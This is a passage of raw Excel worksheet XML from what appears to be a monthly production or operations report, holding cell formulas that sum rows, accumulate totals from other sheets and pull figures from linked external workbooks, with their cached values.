        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]30'!$I$26+'[11]30'!$I$21+'[12]30'!$I$19+'[13]30'!$I$29+'[14]30'!$E$28+'[14]30'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'29'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]30'!$L$26+'[11]30'!$L$21+'[12]30'!$L$19+'[13]30'!$L$29+'[14]30'!$H$28+'[14]30'!$H$35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5762.37000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'29'!H12</f>
        <v>219925.440000001</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5162316.69</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>22200.675</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'29'!K12</f>
        <v>510672.108</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5539778.484</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>140850.227000051</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>32.0843341685765</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]30'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]30'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]30'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]30'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]30'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]30'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]30'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]30'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]30'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'29'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'29'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>25.8440783486332</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]30'!$W$68</f>
        <v>0</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]30'!$X$68</f>
        <v>263.636596158273</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]30'!$Y$68</f>
        <v>266.206969721701</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]30'!$T$68</f>
        <v>0</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]30'!$U$68</f>
        <v>54.3013888888889</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]30'!$V$68</f>
        <v>70.1293498168498</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]30'!$Q$68</f>
        <v>0.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]30'!$R$68</f>
        <v>390.97</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]30'!$S$68</f>
        <v>6126.50</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>6231</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'29'!H14</f>
        <v>82812</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>1047355.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>10462.393</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'29'!K14</f>
        <v>172850.378</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1965794.484</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>50436.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]30'!$W$71</f>
        <v>221</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]30'!$X$71</f>
        <v>222.254496376493</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]30'!$Y$71</f>
        <v>214.183665992723</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]30'!$T$71</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]30'!$U$71</f>
        <v>47.3375</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]30'!$V$71</f>
        <v>49.9923305860806</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]30'!$Q$71</f>
        <v>8.00</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]30'!$R$71</f>
        <v>340.83</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]30'!$S$71</f>
        <v>4367.33</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'29'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>519.804</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'29'!K15</f>
        <v>9531.752</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>124288.252</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]30'!$W$72</f>
        <v>62.375</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]30'!$X$72</f>
        <v>62.8803202248387</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]30'!$Y$72</f>
        <v>61.4494388707342</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]30'!$T$72</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]30'!$U$72</f>
        <v>65.2319444444445</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]30'!$V$72</f>
        <v>51.9479166666667</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]30'!$Q$72</f>
        <v>8.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]30'!$R$72</f>
        <v>469.67</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]30'!$S$72</f>
        <v>4538.17</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'29'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'29'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]30'!$W$73</f>
        <v>62.875</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]30'!$X$73</f>
        <v>60.9824222441565</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]30'!$Y$73</f>
        <v>62.7196953158776</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]30'!$T$73</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]30'!$U$73</f>
        <v>66.1347222222222</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]30'!$V$73</f>
        <v>53.4842032967033</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]30'!$Q$73</f>
        <v>8.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]30'!$R$73</f>
        <v>476.17</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]30'!$S$73</f>
        <v>4672.38</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'29'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'29'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]30'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]30'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]30'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]30'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]30'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]30'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]30'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]30'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]30'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'29'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'29'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]30'!$W$74</f>
        <v>217.7</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]30'!$X$74</f>
        <v>217.78431372549</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]30'!$Y$74</f>
        <v>221.695058213968</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]30'!$T$74</f>
        <v>41.6666666666667</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]30'!$U$74</f>
        <v>14.1666666666667</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]30'!$V$74</f>
        <v>7.59993131868132</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]30'!$Q$74</f>
        <v>10</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]30'!$R$74</f>
        <v>102</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]30'!$S$74</f>
        <v>663.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'29'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'29'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]30'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]30'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]30'!$Y$72</f>
        <v>9.1644204851752e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]30'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]30'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]30'!$V$72</f>
        <v>4.24679487179487e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]30'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]30'!$R$72</f>
        <v>3e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]30'!$S$72</f>
        <v>0.000371</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'29'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'29'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]30'!$W$73</f>
        <v>240.098739995886</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]30'!$X$73</f>
        <v>210.117613494909</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]30'!$Y$73</f>
        <v>238.053692220411</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]30'!$T$73</f>
        <v>100.000004166667</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]30'!$U$73</f>
        <v>35.8208375</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]30'!$V$73</f>
        <v>69.1350775068681</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]30'!$Q$73</f>
        <v>24.000001</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]30'!$R$73</f>
        <v>257.91003</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]30'!$S$73</f>
        <v>6039.640371</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]30'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]30'!$E$22</f>
        <v>5172</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'29'!H21</f>
        <v>211690</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2321128</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]30'!$I$22</f>
        <v>8594.3</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'29'!K21</f>
        <v>241610.19</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2308064.19</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]30'!$L$22</f>
        <v>53133.12</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>113.049191489362</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]30'!$W$81</f>
        <v>271.824375</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]30'!$X$81</f>
        <v>277.281762162485</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]30'!$Y$81</f>
        <v>275.808449230233</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]30'!$T$81</f>
        <v>66.6666666666667</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]30'!$U$81</f>
        <v>34.8792824074074</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]30'!$V$81</f>
        <v>36.0221401862027</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]30'!$Q$81</f>
        <v>16</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]30'!$R$81</f>
        <v>251.130833333333</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]30'!$S$81</f>
        <v>3146.89416666667</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]30'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]30'!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'29'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]30'!$I$17</f>
        <v>6712.07</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'29'!K22</f>
        <v>202124.06</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>2093585.44</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]30'!$L$17</f>
        <v>50502.292</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>25.251146</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]30'!$W$79</f>
        <v>100.501744821959</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]30'!$X$79</f>
        <v>102.48793507571</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]30'!$Y$79</f>
        <v>102.280788161952</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]30'!$T$79</f>
        <v>66.6655092592593</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]30'!$U$79</f>
        <v>50.5479552469136</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]30'!$V$79</f>
        <v>45.8047638125763</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]30'!$Q$79</f>
        <v>15.9997222222222</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]30'!$R$79</f>
        <v>363.945277777778</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]30'!$S$79</f>
        <v>4001.50416666667</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]30'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]30'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'29'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]30'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'29'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]30'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]30'!$W$80</f>
        <v>87.2323668931665</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]30'!$X$80</f>
        <v>83.9937383329559</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]30'!$Y$80</f>
        <v>79.5974862641465</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]30'!$T$80</f>
        <v>63.1932870370371</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]30'!$U$80</f>
        <v>38.6685570987654</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]30'!$V$80</f>
        <v>33.0044579263329</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]30'!$Q$80</f>
        <v>15.1663888888889</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]30'!$R$80</f>
        <v>278.413611111111</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]30'!$S$80</f>
        <v>2883.26944444445</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]30'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]30'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'29'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]30'!$I$56</f>
        <v>2649.07</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'29'!K24</f>
        <v>45303.28</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>325129.81</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]30'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]30'!$R$6</f>
        <v>89.7241379310345</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]30'!$S$6</f>
        <v>83.7465803986278</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]30'!$T$6</f>
        <v>85.9220109571383</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]30'!$O$6</f>
        <v>60.4166666666667</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]30'!$P$6</f>
        <v>63.9694444444444</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]30'!$Q$6</f>
        <v>53.279532967033</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]30'!$L$6</f>
        <v>14.5</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]30'!$M$6</f>
        <v>460.58</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]30'!$N$6</f>
        <v>4654.5</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]30'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'29'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]30'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'29'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]30'!$R$7</f>
        <v>184.333333333333</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]30'!$S$7</f>
        <v>188.583234946871</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]30'!$T$7</f>
        <v>187.667788253923</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]30'!$O$7</f>
        <v>100</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]30'!$P$7</f>
        <v>58.8194444444444</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]30'!$Q$7</f>
        <v>50.8937728937729</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]30'!$L$7</f>
        <v>24</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]30'!$M$7</f>
        <v>423.5</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]30'!$N$7</f>
        <v>4446.08</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'29'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
